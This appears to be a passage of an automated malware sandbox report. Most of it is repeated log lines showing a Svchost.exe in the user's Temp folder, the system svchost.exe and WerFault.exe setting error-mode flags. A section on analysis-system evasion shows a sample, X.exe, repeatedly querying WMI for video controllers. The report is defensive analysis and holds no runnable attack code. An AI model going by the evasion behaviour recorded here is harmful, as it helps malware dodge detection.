                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
